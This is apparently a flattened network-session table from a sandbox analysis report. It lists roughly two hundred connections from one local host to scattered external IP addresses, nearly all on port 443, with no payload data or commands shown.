                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16491192.168.2.1446004201.114.167.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16492192.168.2.1449630135.109.124.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16493192.168.2.1435684107.16.243.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16494192.168.2.1460880104.191.118.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16495192.168.2.145473286.227.240.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16496192.168.2.145944032.88.136.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16497192.168.2.1455100171.124.10.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16498192.168.2.14505884.78.17.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16499192.168.2.1450396197.16.84.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16500192.168.2.1440844116.1.24.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16501192.168.2.1439258191.254.238.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16502192.168.2.144291460.65.176.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16503192.168.2.1439656201.123.97.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16504192.168.2.1454974188.229.45.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16505192.168.2.1460204164.98.181.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16506192.168.2.1446046219.74.185.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16507192.168.2.1433542180.46.105.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16508192.168.2.1434326123.175.122.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16509192.168.2.1450160103.8.225.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16510192.168.2.144295644.156.236.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16511192.168.2.1457402164.45.192.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16512192.168.2.1456196185.64.233.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16513192.168.2.144581476.36.175.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16514192.168.2.1445036175.2.143.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16515192.168.2.143756834.157.247.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16516192.168.2.1432922124.34.93.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16517192.168.2.145581841.209.195.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16518192.168.2.145329296.232.13.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16519192.168.2.144162442.116.127.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16520192.168.2.1447438184.234.228.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16521192.168.2.143749047.18.91.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16522192.168.2.1442818218.56.175.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16523192.168.2.1438342144.153.110.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16524192.168.2.145000653.93.250.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16525192.168.2.1439462160.120.197.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16526192.168.2.145824213.243.252.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16527192.168.2.1443716146.147.124.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16528192.168.2.145936865.98.50.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16529192.168.2.1436238178.135.97.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16530192.168.2.1442562165.35.167.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16531192.168.2.143745474.125.31.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16532192.168.2.1454652195.42.161.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16533192.168.2.1460258139.17.97.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16534192.168.2.1445540185.32.161.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16535192.168.2.1444416165.38.224.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16536192.168.2.1458572176.62.64.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16537192.168.2.1440586150.250.188.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16538192.168.2.1447220195.170.63.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16539192.168.2.1459412186.99.231.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16540192.168.2.1448998134.27.240.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16541192.168.2.1442226223.180.34.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16542192.168.2.1439384114.225.125.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16543192.168.2.1444376145.188.100.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16544192.168.2.1434934207.204.132.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16545192.168.2.1438378105.95.3.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16546192.168.2.1441786150.238.8.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16547192.168.2.1454592128.215.36.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16548192.168.2.1457434140.119.106.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16549192.168.2.1434378152.135.151.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16550192.168.2.143540290.252.174.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16551192.168.2.1454422100.211.181.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16552192.168.2.144244294.100.147.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16553192.168.2.144698817.166.99.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16554192.168.2.1446878136.7.202.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16555192.168.2.1432864137.143.251.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16556192.168.2.146085448.40.59.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16557192.168.2.145589677.143.173.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16558192.168.2.1446202211.196.191.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16559192.168.2.1441494198.9.7.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16560192.168.2.1455912173.92.221.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16561192.168.2.144328480.147.87.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16562192.168.2.1438994156.21.191.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16563192.168.2.143451243.87.148.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16564192.168.2.143958867.8.1.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16565192.168.2.1447888188.32.214.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16566192.168.2.1443812177.176.185.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16567192.168.2.1443036148.4.126.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16568192.168.2.1440384129.137.54.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16569192.168.2.144178860.207.37.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16570192.168.2.144005248.118.132.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16571192.168.2.1458042123.67.168.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16572192.168.2.1453290158.185.240.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16573192.168.2.145125276.161.30.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16574192.168.2.1454790142.147.91.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16575192.168.2.1450664154.50.208.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16576192.168.2.1439382147.203.99.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16577192.168.2.1456574137.243.229.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16578192.168.2.145388438.136.169.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16579192.168.2.143885284.71.180.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16580192.168.2.144208848.252.228.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16581192.168.2.1438078141.215.207.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16582192.168.2.143653440.240.198.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16583192.168.2.1437612213.15.102.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16584192.168.2.1460824216.57.110.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16585192.168.2.1434504201.232.135.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16586192.168.2.1449622194.156.248.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16587192.168.2.1457978148.5.162.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16588192.168.2.1447610119.193.131.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16589192.168.2.1452114176.53.180.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16590192.168.2.1451250168.219.207.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16591192.168.2.1438826219.110.16.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16592192.168.2.1457386159.3.15.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16593192.168.2.143707476.206.108.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16594192.168.2.1434090173.99.191.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16595192.168.2.145622848.205.190.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16596192.168.2.144841236.79.226.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16597192.168.2.145035292.149.27.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16598192.168.2.1454122129.245.220.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16599192.168.2.1443732122.107.127.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16600192.168.2.1448876128.118.97.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16601192.168.2.1438560106.227.11.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16602192.168.2.1441978181.63.242.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16603192.168.2.1442848193.102.112.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16604192.168.2.143460258.189.162.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16605192.168.2.1442838154.209.249.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16606192.168.2.1449046162.60.234.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16607192.168.2.145987088.16.196.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16608192.168.2.1454490194.122.166.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16609192.168.2.14462548.239.41.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16610192.168.2.145638093.48.172.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16611192.168.2.1450018101.129.127.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16612192.168.2.145754883.235.174.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16613192.168.2.143823862.92.200.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16614192.168.2.1451850148.208.115.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16615192.168.2.144353441.44.17.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16616192.168.2.1447866117.178.173.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16617192.168.2.144541683.166.21.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16618192.168.2.145256671.186.47.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16619192.168.2.1434866104.142.177.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16620192.168.2.1460738181.98.24.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16621192.168.2.1458022126.152.173.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16622192.168.2.1452876111.92.233.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16623192.168.2.14399528.130.106.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16624192.168.2.143998853.201.155.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16625192.168.2.1459948160.198.176.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16626192.168.2.1438378176.210.26.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16627192.168.2.1433108107.140.197.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16628192.168.2.145429047.213.211.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16629192.168.2.1440366191.144.29.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16630192.168.2.145348827.137.119.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16631192.168.2.1435030155.144.185.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16632192.168.2.145015086.120.130.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16633192.168.2.144696873.136.71.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16634192.168.2.144582836.226.193.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16635192.168.2.1437778135.175.43.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16636192.168.2.14426882.153.34.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16637192.168.2.144365487.93.30.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16638192.168.2.1449846114.227.109.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16639192.168.2.1440150194.209.18.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16640192.168.2.1444360105.69.114.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16641192.168.2.1434802119.150.184.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16642192.168.2.1440888164.223.195.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16643192.168.2.143588227.180.53.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16644192.168.2.1451034160.201.218.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16645192.168.2.1435164179.45.14.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16646192.168.2.146049462.38.202.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16647192.168.2.145898698.37.124.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16648192.168.2.145440431.92.44.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16649192.168.2.1450750210.202.170.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16650192.168.2.144090866.23.212.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16651192.168.2.1457848125.190.227.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16652192.168.2.145431245.165.164.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16653192.168.2.1436234207.102.190.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16654192.168.2.1458634149.157.115.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16655192.168.2.1449422119.170.50.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16656192.168.2.145906491.123.56.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16657192.168.2.143483640.123.131.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16658192.168.2.1458176104.253.0.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16659192.168.2.143410654.35.4.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16660192.168.2.1433308200.38.91.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16661192.168.2.144147495.192.121.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16662192.168.2.144005092.29.121.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16663192.168.2.145861293.162.221.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16664192.168.2.1437498140.216.131.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16665192.168.2.145562254.160.151.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16666192.168.2.1458720202.223.252.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16667192.168.2.1437536188.33.129.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16668192.168.2.145788636.93.240.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16669192.168.2.1435612166.104.238.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16670192.168.2.143287487.69.101.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16671192.168.2.1456008120.144.42.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16672192.168.2.1435412159.39.10.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16673192.168.2.1450212190.128.144.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16674192.168.2.1441094223.13.245.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16675192.168.2.14593725.59.172.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16676192.168.2.1449480165.36.66.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16677192.168.2.144755618.76.88.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16678192.168.2.143973674.229.76.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16679192.168.2.1434850163.86.208.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16680192.168.2.1455586160.227.217.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16681192.168.2.144290070.14.138.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16682192.168.2.1447798112.109.153.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16683192.168.2.145864681.73.47.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16684192.168.2.1459440200.41.97.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16685192.168.2.1433212152.93.122.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16686192.168.2.144145040.75.2.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16687192.168.2.145393425.135.162.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16688192.168.2.1450518103.144.23.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16689192.168.2.1441052206.130.82.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16690192.168.2.14386865.196.66.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16691192.168.2.145776018.88.127.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16692192.168.2.1447414167.52.237.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16693192.168.2.143787020.185.44.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16694192.168.2.144108449.7.45.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16695192.168.2.1457014173.30.85.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16696192.168.2.1446668144.144.61.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16697192.168.2.143589290.208.83.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16698192.168.2.1439372125.131.101.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16699192.168.2.14530461.132.56.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16700192.168.2.1459422106.147.131.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16701192.168.2.1448064132.5.141.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16702192.168.2.145870495.67.209.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
